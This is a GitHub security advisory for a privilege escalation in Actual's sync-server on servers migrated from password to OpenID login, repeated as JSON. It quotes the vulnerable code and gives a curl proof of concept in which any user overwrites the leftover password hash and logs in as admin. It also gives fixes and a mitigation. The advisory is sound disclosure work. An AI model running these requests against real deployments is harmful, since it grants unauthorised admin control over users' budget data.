GHSA-PRP4-2F49-FCGP

Vulnerability from github – Published: 2026-04-23 21:23 – Updated: 2026-04-23 21:23
VLAI?
Summary
Actual has Privilege Escalation via 'change-password' Endpoint on OpenID-Migrated Servers
Details

Summary

Any authenticated user (including BASIC role) can escalate to ADMIN on servers migrated from password authentication to OpenID Connect. Three weaknesses combine: POST /account/change-password has no authorization check, allowing any session to overwrite the password hash; the inactive password auth row is never removed on migration; and the login endpoint accepts a client-supplied loginMethod that bypasses the server's active auth configuration. Together these allow an attacker to set a known password and authenticate as the anonymous admin account created during the multiuser migration.

Details

packages/sync-server/src/app-account.js:120-132 — the /account/change-password route validates only that a session exists. No admin role check is performed

app.post('/change-password', (req, res) => {
  const session = validateSession(req, res); // only checks token validity
  if (!session) return;
  const { error } = changePassword(req.body.password); // no isAdmin() check

packages/sync-server/src/accounts/password.js:113-125changePassword() updates the hash with no current-password confirmation:

export function changePassword(newPassword) {
  accountDb.mutate("UPDATE auth SET extra_data = ? WHERE method = 'password'", [hashed]);
}

packages/sync-server/src/accounts/password.js:56-62loginWithPassword() always authenticates as the user with user_name = '', which is created by the multiuser migration with role = 'ADMIN':

const sessionRow = accountDb.first(
  'SELECT * FROM sessions WHERE auth_method = ?', ['password']
);

packages/sync-server/src/account-db.js:56-63 — a client can force the password login method regardless of server configuration by sending loginMethod in the request body:

if (req.body.loginMethod && config.get('allowedLoginMethods').includes(req.body.loginMethod)) {
  return req.body.loginMethod;
}

When a server is migrated from password → OpenID via enableOpenID(), the password row is set to active = 0 but never deleted, leaving it available for exploitation.

PoC

Prerequisites: Server originally bootstrapped with password auth, then switched to OpenID. Default allowedLoginMethods configuration (includes password). Attacker has any valid OpenID session token (any role).

# Step 1 — overwrite the password hash using a BASIC-role session
curl -s -X POST https://<host>/account/change-password \
  -H "Content-Type: application/json" \
  -H "X-Actual-Token: <any_valid_session_token>" \
  -d '{"password": "attacker123"}'
# → {"status":"ok","data":{}}

# Step 2 — log in via password method to obtain an ADMIN session
curl -s -X POST https://<host>/account/login \
  -H "Content-Type: application/json" \
  -d '{"loginMethod": "password", "password": "attacker123"}'
# → {"status":"ok","data":{"token":"<admin_token>"}}

The returned token belongs to the user_name = '' admin account (created by 1719409568000-multiuser.js).

Verify admin access:

curl -s https://<host>/account/validate \
  -H "X-Actual-Token: <admin_token>"
# → {"status":"ok","data":{"permission":"ADMIN", ...}}

Impact

Privilege escalation — any authenticated user can gain full ADMIN access on affected deployments. An ADMIN can manage all users, access all budget files regardless of ownership, modify file access controls, and change server configuration.

Affected deployments: multi-user servers running OpenID Connect that were previously configured with password authentication. Servers bootstrapped exclusively with OpenID from initial setup are not affected (no password row exists in the auth table).

Recommendations

1. Restrict POST /account/change-password to password-authenticated sessions only (packages/sync-server/src/app-account.js)

The endpoint should reject requests from sessions that were authenticated via OpenID. The active auth method can be checked against the session's auth_method field or by querying the auth table for the currently active method. If the server is running in OpenID mode, this endpoint should return 403 Forbidden.

2. Require current-password confirmation before accepting a new password (packages/sync-server/src/accounts/password.js)

changePassword() should accept the current password as a parameter and verify it against the stored hash before applying the update. This prevents any session (even a legitimate password session) from silently overwriting the credential without proving possession of the existing one.

3. Enforce active status and remove client control over login method selection (packages/sync-server/src/account-db.jsgetLoginMethod())

Two issues exist in getLoginMethod(): (a) a client can supply loginMethod in the request body to select any method listed in allowedLoginMethods, regardless of whether it is currently active on the server; (b) the function does not check the active column, so an administratively disabled method (e.g. password after migrating to OpenID) remains accessible. The fix is to determine the permitted method server-side from WHERE active = 1 in the auth table and ignore any client-supplied loginMethod override entirely. Servers intentionally running both methods simultaneously can be supported by allowing multiple active = 1 rows rather than relying on client input.

4. Immediate mitigation for existing deployments (OpenID-only servers)

Administrators who have fully migrated to OpenID and do not need password auth can remove the orphaned row:

DELETE FROM auth WHERE method = 'password';

The three weaknesses form a single, sequential exploit chain — none produces privilege escalation on its own:

Missing authorization on POST /change-password — allows overwriting a password hash, but only matters if there is an orphaned row to target. Orphaned password row persisting after migration — provides the target row, but is harmless without the ability to authenticate using it. Client-controlled loginMethod: "password" — allows forcing password-based auth, but is useless without a known hash established by step 1.

All three must be chained in sequence to achieve the impact. No single weakness independently results in privilege escalation, which under CVE CNA rule 4.1.2 means they should not each be treated as standalone vulnerabilities. The single root cause is the missing authorization check on /change-password; the other two are preconditions that make it exploitable. A single CVE reflecting that root cause is the appropriate representation — splitting them would falsely imply each carries independent risk.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@actual-app/sync-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33318"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-23T21:23:38Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAny authenticated user (including `BASIC` role) can escalate to `ADMIN` on servers migrated from password authentication to OpenID Connect. Three weaknesses combine: `POST /account/change-password` has no authorization check, allowing any session to overwrite the password hash; the inactive password `auth` row is never removed on migration; and the login endpoint accepts a client-supplied `loginMethod` that bypasses the server\u0027s active auth configuration. Together these allow an attacker to set a known password and authenticate as the anonymous admin account created during the multiuser migration.\n\n---\n\n### Details\n\n**`packages/sync-server/src/app-account.js:120-132`** \u2014 the `/account/change-password` route validates only that a session exists. No admin role check is performed\n\n```js\napp.post(\u0027/change-password\u0027, (req, res) =\u003e {\n  const session = validateSession(req, res); // only checks token validity\n  if (!session) return;\n  const { error } = changePassword(req.body.password); // no isAdmin() check\n```\n\n**`packages/sync-server/src/accounts/password.js:113-125`** \u2014 `changePassword()` updates the hash with no current-password confirmation:\n\n```js\nexport function changePassword(newPassword) {\n  accountDb.mutate(\"UPDATE auth SET extra_data = ? WHERE method = \u0027password\u0027\", [hashed]);\n}\n```\n\n**`packages/sync-server/src/accounts/password.js:56-62`** \u2014 `loginWithPassword()` always authenticates as the user with `user_name = \u0027\u0027`, which is created by the multiuser migration with `role = \u0027ADMIN\u0027`:\n\n```js\nconst sessionRow = accountDb.first(\n  \u0027SELECT * FROM sessions WHERE auth_method = ?\u0027, [\u0027password\u0027]\n);\n```\n\n**`packages/sync-server/src/account-db.js:56-63`** \u2014 a client can force the `password` login method regardless of server configuration by sending `loginMethod` in the request body:\n\n```js\nif (req.body.loginMethod \u0026\u0026 config.get(\u0027allowedLoginMethods\u0027).includes(req.body.loginMethod)) {\n  return req.body.loginMethod;\n}\n```\n\nWhen a server is migrated from password \u2192 OpenID via `enableOpenID()`, the password row is set to `active = 0` but **never deleted**, leaving it available for exploitation.\n\n---\n\n### PoC\n\n**Prerequisites:** Server originally bootstrapped with password auth, then switched to OpenID. Default `allowedLoginMethods` configuration (includes `password`). Attacker has any valid OpenID session token (any role).\n\n```bash\n# Step 1 \u2014 overwrite the password hash using a BASIC-role session\ncurl -s -X POST https://\u003chost\u003e/account/change-password \\\n  -H \"Content-Type: application/json\" \\\n  -H \"X-Actual-Token: \u003cany_valid_session_token\u003e\" \\\n  -d \u0027{\"password\": \"attacker123\"}\u0027\n# \u2192 {\"status\":\"ok\",\"data\":{}}\n\n# Step 2 \u2014 log in via password method to obtain an ADMIN session\ncurl -s -X POST https://\u003chost\u003e/account/login \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"loginMethod\": \"password\", \"password\": \"attacker123\"}\u0027\n# \u2192 {\"status\":\"ok\",\"data\":{\"token\":\"\u003cadmin_token\u003e\"}}\n```\n\nThe returned token belongs to the `user_name = \u0027\u0027` admin account (created by `1719409568000-multiuser.js`).\n\nVerify admin access:\n```bash\ncurl -s https://\u003chost\u003e/account/validate \\\n  -H \"X-Actual-Token: \u003cadmin_token\u003e\"\n# \u2192 {\"status\":\"ok\",\"data\":{\"permission\":\"ADMIN\", ...}}\n```\n\n---\n\n### Impact\n\n**Privilege escalation** \u2014 any authenticated user can gain full `ADMIN` access on affected deployments. An ADMIN can manage all users, access all budget files regardless of ownership, modify file access controls, and change server configuration.\n\nAffected deployments: multi-user servers running OpenID Connect that were previously configured with password authentication. Servers bootstrapped exclusively with OpenID from initial setup are not affected (no password row exists in the `auth` table).\n\n---\n\n### Recommendations\n\n**1. Restrict `POST /account/change-password` to password-authenticated sessions only**\n(`packages/sync-server/src/app-account.js`)\n\nThe endpoint should reject requests from sessions that were authenticated via OpenID. The active auth method can be checked against the session\u0027s `auth_method` field or by querying the `auth` table for the currently active method. If the server is running in OpenID mode, this endpoint should return `403 Forbidden`.\n\n**2. Require current-password confirmation before accepting a new password**\n(`packages/sync-server/src/accounts/password.js`)\n\n`changePassword()` should accept the current password as a parameter and verify it against the stored hash before applying the update. This prevents any session (even a legitimate password session) from silently overwriting the credential without proving possession of the existing one.\n\n**3. Enforce `active` status and remove client control over login method selection**\n(`packages/sync-server/src/account-db.js` \u2014 `getLoginMethod()`)\n\nTwo issues exist in `getLoginMethod()`: (a) a client can supply `loginMethod` in the request body to select any method listed in `allowedLoginMethods`, regardless of whether it is currently active on the server; (b) the function does not check the `active` column, so an administratively disabled method (e.g. `password` after migrating to OpenID) remains accessible. The fix is to determine the permitted method server-side from `WHERE active = 1` in the `auth` table and ignore any client-supplied `loginMethod` override entirely. Servers intentionally running both methods simultaneously can be supported by allowing multiple `active = 1` rows rather than relying on client input.\n\n**4. Immediate mitigation for existing deployments (OpenID-only servers)**\n\nAdministrators who have fully migrated to OpenID and do not need password auth can remove the orphaned row:\n\n```sql\nDELETE FROM auth WHERE method = \u0027password\u0027;\n```\n\n####\n\nThe three weaknesses form a single, sequential exploit chain \u2014 none produces privilege escalation on its own:\n\nMissing authorization on POST /change-password \u2014 allows overwriting a password hash, but only matters if there is an orphaned row to target.\nOrphaned password row persisting after migration \u2014 provides the target row, but is harmless without the ability to authenticate using it.\nClient-controlled loginMethod: \"password\" \u2014 allows forcing password-based auth, but is useless without a known hash established by step 1.\n\nAll three must be chained in sequence to achieve the impact. No single weakness independently results in privilege escalation, which under CVE CNA rule 4.1.2 means they should not each be treated as standalone vulnerabilities.\nThe single root cause is the missing authorization check on /change-password; the other two are preconditions that make it exploitable. A single CVE reflecting that root cause is the appropriate representation \u2014 splitting them would falsely imply each carries independent risk.",
  "id": "GHSA-prp4-2f49-fcgp",
  "modified": "2026-04-23T21:23:38Z",
  "published": "2026-04-23T21:23:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/actualbudget/actual/security/advisories/GHSA-prp4-2f49-fcgp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/actualbudget/actual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Actual has Privilege Escalation via \u0027change-password\u0027 Endpoint on OpenID-Migrated Servers"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.